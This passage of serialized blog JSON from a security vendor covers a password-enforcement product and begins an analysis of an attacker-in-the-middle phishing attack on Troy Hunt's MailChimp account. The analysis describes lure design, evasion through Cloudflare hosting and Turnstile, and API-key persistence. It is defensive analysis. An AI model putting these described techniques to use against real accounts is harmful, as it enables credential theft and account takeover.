IT).",{"data":49435,"content":49436,"nodeType":860},{},[49437,49441,49446],{"data":49438,"marks":49439,"value":49440,"nodeType":864},{},[],"You can also configure Push to monitor ",{"data":49442,"marks":49443,"value":49445,"nodeType":864},{},[49444],{"type":2246},"any",{"data":49447,"marks":49448,"value":49449,"nodeType":864},{},[]," login to a work app, regardless of the associated email domain of the employee. This means you can monitor personal account logins to apps that are commonly used for work.",{"data":49451,"content":49455,"nodeType":996},{"target":49452},{"sys":49453},{"id":49454,"type":1001,"linkType":1002},"4ctCB7kBscj12BnfHhk3ro",[],{"data":49457,"content":49458,"nodeType":1312},{},[49459],{"data":49460,"marks":49461,"value":49463,"nodeType":864},{},[49462],{"type":899},"2. A way to identify the login methods an account is using, whether that’s SAML, OIDC, or password.",{"data":49465,"content":49466,"nodeType":860},{},[49467],{"data":49468,"marks":49469,"value":49470,"nodeType":864},{},[],"Again, because Push observes the login event, it can analyze the authentication method or methods in use by a given account. Push tells you which SSO accounts still have passwords associated with them, and which authentication methods are being actively used.",{"data":49472,"content":49476,"nodeType":996},{"target":49473},{"sys":49474},{"id":49475,"type":1001,"linkType":1002},"pVD238hZ331gjWalDTM1q",[],{"data":49478,"content":49479,"nodeType":1312},{},[49480],{"data":49481,"marks":49482,"value":49484,"nodeType":864},{},[49483],{"type":899},"3. A method for analyzing whether an employee is using secure passwords on all their accounts.",{"data":49486,"content":49487,"nodeType":860},{},[49488,49492,49501],{"data":49489,"marks":49490,"value":49491,"nodeType":864},{},[],"Using Push, you can also check the posture of all your employee accounts. The browser agent accomplishes this by ",{"data":49493,"content":49495,"nodeType":883},{"uri":49494},"https://pushsecurity.com/help/10065#start",[49496],{"data":49497,"marks":49498,"value":49500,"nodeType":864},{},[49499],{"type":1455},"creating a salted hash",{"data":49502,"marks":49503,"value":49504,"nodeType":864},{},[]," of a user’s observed password and then taking the first 8 characters of that hash to store locally in the browser.",{"data":49506,"content":49507,"nodeType":860},{},[49508],{"data":49509,"marks":49510,"value":49511,"nodeType":864},{},[],"This allows Push to analyze whether the password is weak (comparing the hash to a list of 10,000 common basewords and common permutations); or reused across accounts.",{"data":49513,"content":49514,"nodeType":860},{},[49515,49519,49528,49532,49541],{"data":49516,"marks":49517,"value":49518,"nodeType":864},{},[],"Push can also identify when employee passwords have ",{"data":49520,"content":49522,"nodeType":883},{"uri":49521},"https://pushsecurity.com/help/10066#start",[49523],{"data":49524,"marks":49525,"value":49527,"nodeType":864},{},[49526],{"type":1455},"appeared in a public breach list",{"data":49529,"marks":49530,"value":49531,"nodeType":864},{},[]," using the Have I Been Pwned service, using a k-anonymized hash. Using similar secure methods, Push can detect when employees are sharing account credentials, whether they’re using a ",{"data":49533,"content":49535,"nodeType":883},{"uri":49534},"https://pushsecurity.com/help/10085/#start",[49536],{"data":49537,"marks":49538,"value":49540,"nodeType":864},{},[49539],{"type":1455},"password manager",{"data":49542,"marks":49543,"value":49544,"nodeType":864},{},[],", and which one.",{"data":49546,"content":49547,"nodeType":860},{},[49548,49552,49562],{"data":49549,"marks":49550,"value":49551,"nodeType":864},{},[],"Using Push’s ",{"data":49553,"content":49555,"nodeType":883},{"uri":49554},"https://pushsecurity.com/blog/verified-stolen-credential-detection/",[49556],{"data":49557,"marks":49558,"value":49561,"nodeType":864},{},[49559,49560],{"type":1455},{"type":899},"Stolen credentials detection",{"data":49563,"marks":49564,"value":49565,"nodeType":864},{},[]," feature, you can also get alerted when an employee is using credentials that match those for sale in criminal forums. Push integrates with commercial threat intelligence sources to perform these matches, and you can also bring your own TI using the Push REST API to perform additional checks for in-use stolen creds. This check still happens locally in the browser, so no hashes are sent to third-party systems.",{"data":49567,"content":49571,"nodeType":996},{"target":49568},{"sys":49569},{"id":49570,"type":1001,"linkType":1002},"6wfLCTzvHeMzagyuEWGyJg",[],{"data":49573,"content":49574,"nodeType":860},{},[49575,49579,49588],{"data":49576,"marks":49577,"value":49578,"nodeType":864},{},[],"If you configure Push to also monitor for employees who are logging in to work apps using ",{"data":49580,"content":49582,"nodeType":883},{"uri":49581},"https://pushsecurity.com/help/10105#start",[49583],{"data":49584,"marks":49585,"value":49587,"nodeType":864},{},[49586],{"type":1455},"personal email addresses",{"data":49589,"marks":49590,"value":49591,"nodeType":864},{},[]," or any non-corporate email, Push can identify when personal accounts and work accounts are reusing passwords for the same work application.",{"data":49593,"content":49594,"nodeType":860},{},[49595,49599,49608],{"data":49596,"marks":49597,"value":49598,"nodeType":864},{},[],"Using the Push ",{"data":49600,"content":49602,"nodeType":883},{"uri":49601},"https://pushsecurity.com/help/audience/administrators/docs/getting-started/#api-and-webhooks",[49603],{"data":49604,"marks":49605,"value":49607,"nodeType":864},{},[49606],{"type":1455},"REST API and webhooks",{"data":49609,"marks":49610,"value":49611,"nodeType":864},{},[],", you can get alerted when Push raises a security finding for an account, and when a finding is resolved.",{"data":49613,"content":49614,"nodeType":1312},{},[49615],{"data":49616,"marks":49617,"value":49619,"nodeType":864},{},[49618],{"type":899},"4. The ability to solve any issues at scale, including remediating bad passwords and enforcing MFA, even on apps where the security team doesn’t have administrative control.",{"data":49621,"content":49622,"nodeType":860},{},[49623],{"data":49624,"marks":49625,"value":49626,"nodeType":864},{},[],"Finally, you can enforce self-remediation workflows using Push’s position in the browser, right where employees are working. ",{"data":49628,"content":49629,"nodeType":860},{},[49630],{"data":49631,"marks":49632,"value":49633,"nodeType":864},{},[],"Push recently released a new in-browser control to enforce strong passwords. It works by detecting when an employee has a password security issue, and then prompting them to update their password by displaying a customizable banner message when they log in to the affected account.",{"data":49635,"content":49639,"nodeType":996},{"target":49636},{"sys":49637},{"id":49638,"type":1001,"linkType":1002},"4IfBLaE66CJSsb5h44vSNp",[],{"data":49641,"content":49642,"nodeType":860},{},[49643,49647,49656],{"data":49644,"marks":49645,"value":49646,"nodeType":864},{},[],"This control complements an existing ",{"data":49648,"content":49650,"nodeType":883},{"uri":49649},"https://pushsecurity.com/blog/enforce-mfa-on-third-party-apps/",[49651],{"data":49652,"marks":49653,"value":49655,"nodeType":864},{},[49654],{"type":1455},"MFA enforcement",{"data":49657,"marks":49658,"value":49659,"nodeType":864},{},[]," guardrail, which uses a similar workflow to prompt employees to register for MFA on apps where it’s missing.",{"data":49661,"content":49662,"nodeType":1005},{},[],{"data":49664,"content":49665,"nodeType":1009},{},[49666],{"data":49667,"marks":49668,"value":49670,"nodeType":864},{},[49669],{"type":899},"A closer look at password enforcement",{"data":49672,"content":49673,"nodeType":860},{},[49674,49678,49682],{"data":49675,"marks":49676,"value":49677,"nodeType":864},{},[],"In the spirit of helping users do the right thing, we designed the",{"data":49679,"marks":49680,"value":1171,"nodeType":864},{},[49681],{"type":899},{"data":49683,"marks":49684,"value":49685,"nodeType":864},{},[],"password enforcement control to meet users where they are, in the most relevant context where they can fix the problem. ",{"data":49687,"content":49688,"nodeType":860},{},[49689],{"data":49690,"marks":49691,"value":49692,"nodeType":864},{},[],"Because this control is powered by the Push browser agent, security teams don’t need administrative control over every app where password accounts exist — which often isn’t practical for all the reasons we reviewed earlier. Instead, they can use Push to prompt employees to fix the issue themselves.",{"data":49694,"content":49695,"nodeType":860},{},[49696],{"data":49697,"marks":49698,"value":49699,"nodeType":864},{},[],"Here’s a closer look at how it works:",{"data":49701,"content":49702,"nodeType":941},{},[49703,49730,49740],{"data":49704,"content":49705,"nodeType":945},{},[49706],{"data":49707,"content":49708,"nodeType":860},{},[49709,49713,49717,49721,49726],{"data":49710,"marks":49711,"value":49712,"nodeType":864},{},[],"You can enable ",{"data":49714,"marks":49715,"value":48940,"nodeType":864},{},[49716],{"type":899},{"data":49718,"marks":49719,"value":49720,"nodeType":864},{},[]," from the tile on the ",{"data":49722,"marks":49723,"value":49725,"nodeType":864},{},[49724],{"type":899},"Controls",{"data":49727,"marks":49728,"value":49729,"nodeType":864},{},[]," page of the Push admin console. ",{"data":49731,"content":49732,"nodeType":945},{},[49733],{"data":49734,"content":49735,"nodeType":860},{},[49736],{"data":49737,"marks":49738,"value":49739,"nodeType":864},{},[],"Using the rule editor, select whether you want to apply the control for all employees, or just specific groups or individuals, and which apps it should apply to. You can also select which types of password security issues you want to prompt users about.",{"data":49741,"content":49742,"nodeType":945},{},[49743],{"data":49744,"content":49745,"nodeType":860},{},[49746],{"data":49747,"marks":49748,"value":49749,"nodeType":864},{},[],"Then customize the message that employees will see. Push will then automatically display the banner based on your criteria. Where possible, Push will include a link in the banner that takes employees directly to the page in the app where they can change their password — or you can add a link yourself.",{"data":49751,"content":49755,"nodeType":996},{"target":49752},{"sys":49753},{"id":49754,"type":1001,"linkType":1002},"shpVOAMlk7OE1mWrE9h8S",[],{"data":49757,"content":49758,"nodeType":860},{},[49759],{"data":49760,"marks":49761,"value":49762,"nodeType":864},{},[],"Once the password has been changed and Push verifies that the new password is strong, you’ll see the security finding cleared from the account record in the admin console and the banner will no longer display to the end-user.",{"data":49764,"content":49765,"nodeType":860},{},[49766],{"data":49767,"marks":49768,"value":49769,"nodeType":864},{},[],"Push also sends webhook events when:",{"data":49771,"content":49772,"nodeType":941},{},[49773,49783,49793,49803],{"data":49774,"content":49775,"nodeType":945},{},[49776],{"data":49777,"content":49778,"nodeType":860},{},[49779],{"data":49780,"marks":49781,"value":49782,"nodeType":864},{},[],"A banner is displayed",{"data":49784,"content":49785,"nodeType":945},{},[49786],{"data":49787,"content":49788,"nodeType":860},{},[49789],{"data":49790,"marks":49791,"value":49792,"nodeType":864},{},[],"A user clicks the link in the banner to take action",{"data":49794,"content":49795,"nodeType":945},{},[49796],{"data":49797,"content":49798,"nodeType":860},{},[49799],{"data":49800,"marks":49801,"value":49802,"nodeType":864},{},[],"A password is updated",{"data":49804,"content":49805,"nodeType":945},{},[49806],{"data":49807,"content":49808,"nodeType":860},{},[49809],{"data":49810,"marks":49811,"value":49812,"nodeType":864},{},[],"A password security finding is resolved",{"data":49814,"content":49815,"nodeType":1005},{},[],{"data":49817,"content":49818,"nodeType":1009},{},[49819],{"data":49820,"marks":49821,"value":49823,"nodeType":864},{},[49822],{"type":899},"Where to begin",{"data":49825,"content":49826,"nodeType":860},{},[49827],{"data":49828,"marks":49829,"value":49830,"nodeType":864},{},[],"Most organizations we work with deploy the Push agent first to get an initial understanding of their attack surface and account posture issues. Then we recommend enabling the one-two punch of MFA and strong password enforcement guardrails. You can use both controls in tandem, and Push will first seek to resolve the password issues on a given account, and then prompt the user to register for MFA.",{"data":49832,"content":49833,"nodeType":1005},{},[],{"data":49835,"content":49836,"nodeType":1009},{},[49837],{"data":49838,"marks":49839,"value":49840,"nodeType":864},{},[],"Find out more",{"data":49842,"content":49843,"nodeType":860},{},[49844,49848,49855],{"data":49845,"marks":49846,"value":49847,"nodeType":864},{},[],"If you want to learn more about how Push helps you to detect and defeat common identity attack techniques like AiTM phishing, credential stuffing, and session hijacking while improving your workforce identity posture, book some time with one of our team for a ",{"data":49849,"content":49850,"nodeType":883},{"uri":5642},[49851],{"data":49852,"marks":49853,"value":2715,"nodeType":864},{},[49854],{"type":1455},{"data":49856,"marks":49857,"value":2924,"nodeType":864},{},[],"Introducing Push password enforcement — for when weak passwords are still plaguing you","Detects when employees have weak, reused, or stolen passwords and guide them to update their password using in-browser messaging on any app. ","2025-03-25T00:00:00.000Z","introducing-strong-password-enforcement",{"items":49863},[49864,49866],{"sys":49865,"name":297},{"id":2732},{"sys":49867,"name":6593},{"id":6592},{"items":49869},[49870],{"fullName":849,"firstName":850,"jobTitle":851,"profilePicture":49871},{"url":853},{"__typename":2059,"sys":49873,"content":49875,"title":50635,"synopsis":50636,"hashTags":59,"publishedDate":50637,"slug":50638,"tagsCollection":50639,"authorsCollection":50645},{"id":49874},"3RhqaMQEBAQBdfHDQeoELF",{"json":49876},{"data":49877,"content":49878,"nodeType":856},{},[49879,49886,49919,49926,49945,49952,49955,49962,49969,49975,49982,49988,49994,50001,50018,50024,50031,50034,50042,50061,50084,50091,50099,50106,50113,50119,50127,50146,50165,50171,50178,50184,50192,50224,50230,50237,50240,50248,50255,50275,50282,50288,50296,50303,50310,50317,50324,50392,50399,50407,50426,50432,50439,50446,50452,50459,50465,50473,50480,50486,50492,50499,50502,50509,50539,50546,50565,50572,50583,50590,50593,50600,50618],{"data":49880,"content":49881,"nodeType":860},{},[49882],{"data":49883,"marks":49884,"value":49885,"nodeType":864},{},[],"Phishing attacks using Attacker-in-the-Middle (AitM) kits are increasingly the default for both credential harvesting campaigns and targeted phishing attacks. It’s easy to see why, too:",{"data":49887,"content":49888,"nodeType":941},{},[49889,49899,49909],{"data":49890,"content":49891,"nodeType":945},{},[49892],{"data":49893,"content":49894,"nodeType":860},{},[49895],{"data":49896,"marks":49897,"value":49898,"nodeType":864},{},[],"They’re very difficult to spot as a user and often function like the real page should, logging the victim into the genuine site once the phish is complete",{"data":49900,"content":49901,"nodeType":945},{},[49902],{"data":49903,"content":49904,"nodeType":860},{},[49905],{"data":49906,"marks":49907,"value":49908,"nodeType":864},{},[],"They’re incredibly scalable, and attackers have an increasing number of options to choose from when it comes to off-the-shelf tools and commercial Phishing-as-a-Service offerings ",{"data":49910,"content":49911,"nodeType":945},{},[49912],{"data":49913,"content":49914,"nodeType":860},{},[49915],{"data":49916,"marks":49917,"value":49918,"nodeType":864},{},[],"And most importantly, they reliably bypass 99% of the MFA methods encountered in the wild, defeating OTP, SMS and push-based authentication",{"data":49920,"content":49921,"nodeType":860},{},[49922],{"data":49923,"marks":49924,"value":49925,"nodeType":864},{},[],"There are basically no downsides to AitM for an attacker. But all the same, they don’t get all that much publicity — probably because traditional phishing prevention solutions are failing to detect them (before the attack succeeds, anyway — and nobody really wants to own up to that). ",{"data":49927,"content":49928,"nodeType":860},{},[49929,49933,49942],{"data":49930,"marks":49931,"value":49932,"nodeType":864},{},[],"So, it’s refreshing to see Troy Hunt, creator of the widely used Have I Been Pwned (HIBP) service, ",{"data":49934,"content":49936,"nodeType":883},{"uri":49935},"https://www.troyhunt.com/a-sneaky-phish-just-grabbed-my-mailchimp-mailing-list/",[49937],{"data":49938,"marks":49939,"value":49941,"nodeType":864},{},[49940],{"type":1455},"publicly discussing a recent attack he fell victim to",{"data":49943,"marks":49944,"value":10094,"nodeType":864},{},[],{"data":49946,"content":49947,"nodeType":860},{},[49948],{"data":49949,"marks":49950,"value":49951,"nodeType":864},{},[],"Before we consider the significance of Troy failing to spot the phish — the creator of one of the most widely used services for stolen passwords, working with government on phishing prevention guidance — let's start by breaking down the attack itself. ",{"data":49953,"content":49954,"nodeType":1005},{},[],{"data":49956,"content":49957,"nodeType":1009},{},[49958],{"data":49959,"marks":49960,"value":5002,"nodeType":864},{},[49961],{"type":899},{"data":49963,"content":49964,"nodeType":860},{},[49965],{"data":49966,"marks":49967,"value":49968,"nodeType":864},{},[],"Troy received a phishing email appearing to be from MailChimp prompting him to sign into his account, with the lure informing him it had had been restricted due to a spam complaint",{"data":49970,"content":49974,"nodeType":996},{"target":49971},{"sys":49972},{"id":49973,"type":1001,"linkType":1002},"5A4CPvTyKhClC8LgHY5916",[],{"data":49976,"content":49977,"nodeType":860},{},[49978],{"data":49979,"marks":49980,"value":49981,"nodeType":864},{},[],"The email matched Mailchimp’s brand, but the sender address was obviously suspicious. Unfortunately, Troy initially accessed the email via mobile, which hid the sender address — which he then missed when accessing from his PC. ",{"data":49983,"content":49987,"nodeType":996},{"target":49984},{"sys":49985},{"id":49986,"type":1001,"linkType":1002},"1JWw4jO3qxxJeHO3qtMuZc",[],{"data":49989,"content":49993,"nodeType":996},{"target":49990},{"sys":49991},{"id":49992,"type":1001,"linkType":1002},"1ebM2R90arTKlCmxmtvYjz",[],{"data":49995,"content":49996,"nodeType":860},{},[49997],{"data":49998,"marks":49999,"value":50000,"nodeType":864},{},[],"Troy was directed to the page hxxps://mailchimp-sso.com. Troy entered his credentials and MFA token and logged in. The page hung and he realized he had been phished…",{"data":50002,"content":50003,"nodeType":860},{},[50004,50008,50015],{"data":50005,"marks":50006,"value":50007,"nodeType":864},{},[],"The attack then automatically executed, with the attacker exporting 16,000 contact records from MailChimp and creating an API key to provide backdoor access to the app (a form of ",{"data":50009,"content":50010,"nodeType":883},{"uri":19131},[50011],{"data":50012,"marks":50013,"value":39752,"nodeType":864},{},[50014],{"type":1455},{"data":50016,"marks":50017,"value":32836,"nodeType":864},{},[],{"data":50019,"content":50023,"nodeType":996},{"target":50020},{"sys":50021},{"id":50022,"type":1001,"linkType":1002},"2MDWfQFU69GaiMCxdvvq8U",[],{"data":50025,"content":50026,"nodeType":860},{},[50027],{"data":50028,"marks":50029,"value":50030,"nodeType":864},{},[],"Let’s have a look at what makes this attack interesting. ",{"data":50032,"content":50033,"nodeType":1005},{},[],{"data":50035,"content":50036,"nodeType":1009},{},[50037],{"data":50038,"marks":50039,"value":50041,"nodeType":864},{},[50040],{"type":899},"Breaking the attack down",{"data":50043,"content":50044,"nodeType":860},{},[50045,50049,50057],{"data":50046,"marks":50047,"value":50048,"nodeType":864},{},[],"As far as ",{"data":50050,"content":50051,"nodeType":883},{"uri":48271},[50052],{"data":50053,"marks":50054,"value":50056,"nodeType":864},{},[50055],{"type":1455},"some of the AitM attacks we’ve observed in the wild",{"data":50058,"marks":50059,"value":50060,"nodeType":864},{},[]," go, this wasn’t the most advanced example we’ve seen: ",{"data":50062,"content":50063,"nodeType":941},{},[50064,50074],{"data":50065,"content":50066,"nodeType":945},{},[50067],{"data":50068,"content":50069,"nodeType":860},{},[50070],{"data":50071,"marks":50072,"value":50073,"nodeType":864},{},[],"It didn’t try to obfuscate the notably suspicious sender address or use a legit SaaS service to give the email sender a reputable domain.",{"data":50075,"content":50076,"nodeType":945},{},[50077],{"data":50078,"content":50079,"nodeType":860},{},[50080],{"data":50081,"marks":50082,"value":50083,"nodeType":864},{},[],"It didn’t see the victim access the real login page, and instead terminated the connection at the point the credentials were captured — meaning Troy was immediately suspicious (I guess it doesn’t really matter given the attack executed instantly, automatically).",{"data":50085,"content":50086,"nodeType":860},{},[50087],{"data":50088,"marks":50089,"value":50090,"nodeType":864},{},[],"That said, it did use a few interesting tricks and techniques. ",{"data":50092,"content":50093,"nodeType":1312},{},[50094],{"data":50095,"marks":50096,"value":50098,"nodeType":864},{},[50097],{"type":899},"Enumerating suitable victims",{"data":50100,"content":50101,"nodeType":860},{},[50102],{"data":50103,"marks":50104,"value":50105,"nodeType":864},{},[],"It’s notable that Troy claims the email he used to access MailChimp wasn’t used anywhere else — meaning the attacker probably guessed it. The domain is partially obscured here but it's likely that this is Troy’s own personal domain. It isn’t too much of a stretch to imagine that organizations frequently set up dedicated email addresses for their MailChimp accounts or newsletters generally (e.g. mailchimp@exampledomain.com). ",{"data":50107,"content":50108,"nodeType":860},{},[50109],{"data":50110,"marks":50111,"value":50112,"nodeType":864},{},[],"Undeniably, Troy’s MailChimp account is probably more of a target than most given the success of his newsletter, but it’s still likely that the attacker spammed many possible address and domain combinations to see what stuck. There’s a degree of luck, but also some smart guesswork at play here. ",{"data":50114,"content":50118,"nodeType":996},{"target":50115},{"sys":50116},{"id":50117,"type":1001,"linkType":1002},"5TgXthj5tsvWX87QHZH1WQ",[],{"data":50120,"content":50121,"nodeType":1312},{},[50122],{"data":50123,"marks":50124,"value":50126,"nodeType":864},{},[50125],{"type":899},"Using legit services like Cloudflare to defeat detections ",{"data":50128,"content":50129,"nodeType":860},{},[50130,50134,50142],{"data":50131,"marks":50132,"value":50133,"nodeType":864},{},[],"The attacker used Cloudflare to host the domain, which is ",{"data":50135,"content":50136,"nodeType":883},{"uri":48183},[50137],{"data":50138,"marks":50139,"value":50141,"nodeType":864},{},[50140],{"type":1455},"consistent with what we’ve observed attackers doing in the wild",{"data":50143,"marks":50144,"value":50145,"nodeType":864},{},[],". Even if this means that Cloudflare will probably take the domain down eventually, they aren’t great at identifying the page right away. Given the rate at which attacker infrastructure is burned and rotated, the pros outweigh the cons for the attacker by giving the site legitimate hosting infrastructure, which can defeat some of the common checks performed by anti-phishing tools.",{"data":50147,"content":50148,"nodeType":860},{},[50149,50153,50161],{"data":50150,"marks":50151,"value":50152,"nodeType":864},{},[],"Troy also mentions seeing a 'Cloudflare anti-automation widget' when accessing the page, which is most likely Cloudflare Turnstile — a creative alternative to CAPTCHA to prevent security bots from accessing and loading malicious pages to analyse them. We've seen attackers use Turnstile ",{"data":50154,"content":50155,"nodeType":883},{"uri":48183},[50156],{"data":50157,"marks":50158,"value":50160,"nodeType":864},{},[50159],{"type":1455},"along with a host of other obfuscation techniques",{"data":50162,"marks":50163,"value":50164,"nodeType":864},{},[]," to defeat common detections by preventing security tools from analysing the malicious page. ",{"data":50166,"content":50170,"nodeType":996},{"target":50167},{"sys":50168},{"id":50169,"type":1001,"linkType":1002},"2X1r1qbE5CVcJ0xVcESGK7",[],{"data":50172,"content":50173,"nodeType":860},{},[50174],{"data":50175,"marks":50176,"value":50177,"nodeType":864},{},[],"Although this page has now been taken down, the campaign undoubtedly continues — another will have been rotated in to take its place. ",{"data":50179,"content":50183,"nodeType":996},{"target":50180},{"sys":50181},{"id":50182,"type":1001,"linkType":1002},"26wnNFTED2f6O1HtqL3Cgu",[],{"data":50185,"content":50186,"nodeType":1312},{},[50187],{"data":50188,"marks":50189,"value":50191,"nodeType":864},{},[50190],{"type":899},"Configuring ghost logins via API keys to backdoor the account ",{"data":50193,"content":50194,"nodeType":860},{},[50195,50199,50208,50212,50220],{"data":50196,"marks":50197,"value":50198,"nodeType":864},{},[],"The attacker also configured an API key — a smart way to backdoor an app and something we’ve previously ",{"data":50200,"content":50202,"nodeType":883},{"uri":50201},"https://pushsecurity.com/resources/phishing-detecting-evilginx-evilnovnc-muraena-and-modlishka",[50203],{"data":50204,"marks":50205,"value":50207,"nodeType":864},{},[50206],{"type":1455},"demonstrated in our webinars",{"data":50209,"marks":50210,"value":50211,"nodeType":864},{},[]," as a ",{"data":50213,"content":50214,"nodeType":883},{"uri":6418},[50215],{"data":50216,"marks":50217,"value":50219,"nodeType":864},{},[50218],{"type":1455},"SaaS-native attack technique",{"data":50221,"marks":50222,"value":50223,"nodeType":864},{},[]," for persistence. It means that even if the credentials are changed, the attacker can maintain access to the account.",{"data":50225,"content":50229,"nodeType":996},{"target":50226},{"sys":50227},{"id":50228,"type":1001,"linkType":1002},"35GkKL1rXnWHNZa1EBHLyD",[],{"data":50231,"content":50232,"nodeType":860},{},[50233],{"data":50234,"marks":50235,"value":50236,"nodeType":864},{},[],"Now, as a security pro, Troy noticed this and deleted it — but many less technical victims wouldn’t know to do this. It’s also not unusual for automated emails from applications to go to spam — meaning some victims potentially wouldn’t spot the notification sent to them. ",{"data":50238,"content":50239,"nodeType":1005},{},[],{"data":50241,"content":50242,"nodeType":1009},{},[50243],{"data":50244,"marks":50245,"value":50247,"nodeType":864},{},[50246],{"type":899},"But — why MailChimp? ",{"data":50249,"content":50250,"nodeType":860},{},[50251],{"data":50252,"marks":50253,"value":50254,"nodeType":864},{},[],"This was the big question we asked ourselves when looking into this attack. Most phishing attacks targeting businesses tend to focus on core platforms like Microsoft, Google Workspace, etc. — usually Identity Providers (IdPs) that provide both access to email and downstream apps via SSO. It’s the biggest bang for their buck and most tooling is preconfigured to support these platforms. So MailChimp seems an unusual choice at first glance. ",{"data":50256,"content":50257,"nodeType":860},{},[50258,50262,50271],{"data":50259,"marks":50260,"value":50261,"nodeType":864},{},[],"But, we’ve seen recently that it's getting easier for attackers to ",{"data":50263,"content":50265,"nodeType":883},{"uri":50264},"https://www.bleepingcomputer.com/news/security/darcula-phaas-can-now-auto-generate-phishing-kits-for-any-brand/",[50266],{"data":50267,"marks":50268,"value":50270,"nodeType":864},{},[50269],{"type":1455},"impersonate a broader range of brands",{"data":50272,"marks":50273,"value":50274,"nodeType":864},{},[],". And there’s something to be said for targeting an app like MailChimp — your guard is naturally probably lower than it would be for a Microsoft-based phish, increasing the chance of success. ",{"data":50276,"content":50277,"nodeType":860},{},[50278],{"data":50279,"marks":50280,"value":50281,"nodeType":864},{},[],"But what’s the payout? The data collected doesn’t seem to be overly valuable — 16k records including email address, IP, and rough geolocation data. Not particularly exploitable by itself…",{"data":50283,"content":50287,"nodeType":996},{"target":50284},{"sys":50285},{"id":50286,"type":1001,"linkType":1002},"OjZtHXit6WO6Zd9tCUYpJ",[],{"data":50289,"content":50290,"nodeType":1312},{},[50291],{"data":50292,"marks":50293,"value":50295,"nodeType":864},{},[50294],{"type":899},"Part of a multi stage attack? ",{"data":50297,"content":50298,"nodeType":860},{},[50299],{"data":50300,"marks":50301,"value":50302,"nodeType":864},{},[],"This gets a lot more interesting when you consider the different things an attacker might do as part of a broader campaign. ",{"data":50304,"content":50305,"nodeType":860},{},[50306],{"data":50307,"marks":50308,"value":50309,"nodeType":864},{},[],"With access to MailChimp, an attacker can send emails on behalf of the compromised account. These emails are highly trusted and expected from the sender, meaning people receiving them are much more likely to engage with the content, click the links, etc. ",{"data":50311,"content":50312,"nodeType":860},{},[50313],{"data":50314,"marks":50315,"value":50316,"nodeType":864},{},[],"So what if an attacker compromised an account, inserted a load of malicious links into the newsletter, and used it in itself as a mass-phishing vector, designed to capture user credentials or deliver malware? Pretty devious! If you scale this up across multiple victims (and not all of them realize that they’ve been phished) you’ve suddenly got your hands on an incredibly valuable phishing vector that is much more likely to succeed than your average cold approach. ",{"data":50318,"content":50319,"nodeType":860},{},[50320],{"data":50321,"marks":50322,"value":50323,"nodeType":864},{},[],"Then, with the additional victims, you could target accounts that are much more inherently valuable to an attacker. You could:",{"data":50325,"content":50326,"nodeType":941},{},[50327,50359,50382],{"data":50328,"content":50329,"nodeType":945},{},[50330],{"data":50331,"content":50332,"nodeType":860},{},[50333,50337,50344,50348,50355],{"data":50334,"marks":50335,"value":50336,"nodeType":864},{},[],"Deploy infostealer malware, which has dominated the headlines since the success of the ",{"data":50338,"content":50339,"nodeType":883},{"uri":3751},[50340],{"data":50341,"marks":50342,"value":43767,"nodeType":864},{},[50343],{"type":1455},{"data":50345,"marks":50346,"value":50347,"nodeType":864},{},[]," attacks last year, and are continually resulting in data breaches via attackers logging into apps using stolen credentials such as the recent attacks on ",{"data":50349,"content":50350,"nodeType":883},{"uri":17536},[50351],{"data":50352,"marks":50353,"value":44266,"nodeType":864},{},[50354],{"type":1455},{"data":50356,"marks":50357,"value":50358,"nodeType":864},{},[]," platforms.",{"data":50360,"content":50361,"nodeType":945},{},[50362],{"data":50363,"content":50364,"nodeType":860},{},[50365,50369,50378],{"data":50366,"marks":50367,"value":50368,"nodeType":864},{},[],"Target personal apps for banking, email, e-com, and other easily monetizable services — which is increasingly easy to do at-scale using ",{"data":50370,"content":50372,"nodeType":883},{"uri":50371},"https://www.bleepingcomputer.com/news/security/new-atlantis-aio-automates-credential-stuffing-on-140-services/",[50373],{"data":50374,"marks":50375,"value":50377,"nodeType":864},{},[50376],{"type":1455},"tooling for hire",{"data":50379,"marks":50380,"value":50381,"nodeType":864},{},[]," with stolen credentials.",{"data":50383,"content":50384,"nodeType":945},{},[50385],{"data":50386,"content":50387,"nodeType":860},{},[50388],{"data":50389,"marks":50390,"value":50391,"nodeType":864},{},[],"Even attempt to deploy ransomware and other malicious software to progress an attack on user devices and networks (a pretty relevant use case for the many subscribers of Troy’s newsletter accessing it on their corporate device!).",{"data":50393,"content":50394,"nodeType":860},{},[50395],{"data":50396,"marks":50397,"value":50398,"nodeType":864},{},[],"Even grabbing the list of newsletter sign-ups could enable the attacker to perform this attack from a different MailChimp account, so anyone subscribed to Troy’s newsletter should be wary of emails impersonating Troy’s newsletter reaching them from a different sender address than usual. ",{"data":50400,"content":50401,"nodeType":1312},{},[50402],{"data":50403,"marks":50404,"value":50406,"nodeType":864},{},[50405],{"type":899},"Account security limitations",{"data":50408,"content":50409,"nodeType":860},{},[50410,50414,50422],{"data":50411,"marks":50412,"value":50413,"nodeType":864},{},[],"On the theme of MailChimp, it’s also notable that MailChimp doesn’t appear to offer SAML support. ",{"data":50415,"content":50417,"nodeType":883},{"uri":50416},"https://www.okta.com/integrations/mailchimp/",[50418],{"data":50419,"marks":50420,"value":50421,"nodeType":864},{},[],"Okta lists the app as only available for SWA",{"data":50423,"marks":50424,"value":50425,"nodeType":864},{},[]," (where separate credentials are created to access the app, managed through Okta — more like a password manager than genuine SSO via SAML or OIDC).",{"data":50427,"content":50431,"nodeType":996},{"target":50428},{"sys":50429},{"id":50430,"type":1001,"linkType":1002},"7b4RZhUIqJMF1OxmyR0qKH",[],{"data":50433,"content":50434,"nodeType":860},{},[50435],{"data":50436,"marks":50437,"value":50438,"nodeType":864},{},[],"This means you’re forced to use a username and password. Your only SSO option is to sign in with Google — which many non-Google Workspace users may not have access to. ",{"data":50440,"content":50441,"nodeType":860},{},[50442],{"data":50443,"marks":50444,"value":50445,"nodeType":864},{},[],"As Troy points out, MailChimp also fails to offer support for phishing-resistant MFA. This is pretty typical (if disappointing) for the long tail of SaaS apps, which typically leave WebAuthn / passkey support to the IdP. Except in this case, support for SSO in general is limited, meaning you can only use passkeys if you’re logging in with Google. ",{"data":50447,"content":50451,"nodeType":996},{"target":50448},{"sys":50449},{"id":50450,"type":1001,"linkType":1002},"2lT7fBiOq4JxpMxSLrdUOv",[],{"data":50453,"content":50454,"nodeType":860},{},[50455],{"data":50456,"marks":50457,"value":50458,"nodeType":864},{},[],"So it’s possible that attackers have noticed that accounts in MailChimp are far more likely to have insecure accounts than other traditional phishing targets — simply because they cannot be configured as securely. ",{"data":50460,"content":50464,"nodeType":996},{"target":50461},{"sys":50462},{"id":50463,"type":1001,"linkType":1002},"30APqb65kzTA4ySWJIkxGh",[],{"data":50466,"content":50467,"nodeType":1312},{},[50468],{"data":50469,"marks":50470,"value":50472,"nodeType":864},{},[50471],{"type":899},"It might not just be 